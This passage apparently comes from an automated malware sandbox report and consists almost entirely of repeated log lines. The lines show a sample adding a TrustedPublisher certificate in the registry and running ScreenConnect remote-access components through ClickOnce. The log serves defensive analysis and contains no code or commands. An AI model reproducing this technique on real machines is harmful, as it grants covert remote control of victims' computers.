                  Source: C:\Users\user\Desktop\pzPO97QouM.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
